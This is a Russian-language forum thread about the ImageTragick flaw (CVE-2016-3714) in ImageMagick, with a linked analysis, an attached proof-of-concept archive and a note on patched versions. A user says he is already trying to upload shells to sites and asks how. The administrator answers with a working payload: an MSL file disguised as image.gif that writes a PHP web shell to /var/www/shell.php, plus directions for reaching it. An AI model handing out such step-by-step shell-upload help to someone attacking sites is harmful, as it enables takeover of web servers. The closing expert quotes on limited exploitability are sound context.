↑ ↓

Информация Анализ уязвимости ImageMagick

Краткий анализ уязвимости ImageMagick в PHP

  1. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.813
    Симпатии:
    433
    Пол:
    Мужской
    Репа:
    +969 / 153 / -29
    Jabber:
    Telegram:
    Пользователь X-Shar разместил новый ресурс:

    Анализ уязвимости ImageMagick - Краткий анализ уязвимости ImageMagick в PHP

    Узнать больше об этом ресурсе...
     
    • Мне нравится Мне нравится x 2
  2. Норинга Уважаемый пользователь
    Норинга
    Ответить в чате

    Форумчанин

    Регистрация:
    07.08.2012
    Сообщения:
    17
    Симпатии:
    10
    Пол:
    Мужской
    Репа:
    +16 / 1 / -0
    Файлики для теста своих бордов ! :)

    Есть также на гитхабе, но нужно ставить гит, для локальной проверки !
     

    Вложения:

    • PoCs.zip
      Размер файла
      72,5 КБ
      Просмотров:
      1
    • Мне нравится Мне нравится x 2
  3. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.813
    Симпатии:
    433
    Пол:
    Мужской
    Репа:
    +969 / 153 / -29
    Jabber:
    Telegram:
    Разработчики уже выпустили исправленные версии ImageMagick 7.0.1-2 и 6.9.4-0. Также они опубликовали PoC-код, позволяющий определить уязвимые серверы (Это-что залил Норинга).
     
  4. LeMMinG Заблокирован
    LeMMinG
    Ответить в чате

    Заблокирован

    Регистрация:
    17.02.2016
    Сообщения:
    55
    Симпатии:
    18
    Пол:
    Мужской
    Репа:
    +23 / 1 / -1
    http://www.oszone.net/29311/ImageMagick_vulnerability
    вот сам сплойт GitHub - ImageTragick/PoCs: Proof of Concepts for CVE-2016–3714
    мы уже шеллы заливаем....ток не выходит чото
    не разобраца как оно робит
    т.е. под видом чего и куда лить
    вызвать то вызовем шелл
    а как юзать ето
    Последовательность какая? Что заливать под видом картинки в каком расширении, как ее потом вызвать и прогрузить шелл
     
  5. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.813
    Симпатии:
    433
    Пол:
    Мужской
    Репа:
    +969 / 153 / -29
    Jabber:
    Telegram:
    Пример, делаем файл image.gif с содержимым:
    Код:
    <?xml version="1.0" encoding="UTF-8"?>
    <image>
    <read filename="/tmp/image.gif" />
    <write filename="/var/www/shell.php" />
    </image>
    В этом-же файле, д.б. код шелла ниже...

    Далее нужно обязательно знать пути к /tmp и сайту /var/www/ если сайт уязвим, то шелл должен-быть тут:/var/www/shell.php ну или mysite.com/shell.php !

    Уязвимость на самом деле не такая простая, а можно проэксплуатировать, только при определенных условиях, вот-что пишет эксперт CloudFlare:

    По словам эксперта CloudFlare Джона Грэма-Камминга (John Graham-Cumming), несмотря на многочисленные попытки использования эксплоитов, в настоящее время нет данных об успешном взломе каких-либо web-сайтов.

    Основатель и технический директор Sucuri Дэниэл Сид (Daniel Cid) также подтвердил, что массовых атак, направленных на эксплуатацию ImageTragick, пока не наблюдается. Как поясняет Сид, значительное количество CMS не используют ImageMagick по умолчанию. Кроме того, успешная эксплуатация уязвимости возможна только при определенных условиях. Видимо, в этом и заключается причина вялого интереса злоумышленников к ImageTragick.
     
    • Мне нравится Мне нравится x 1

Поделиться этой страницей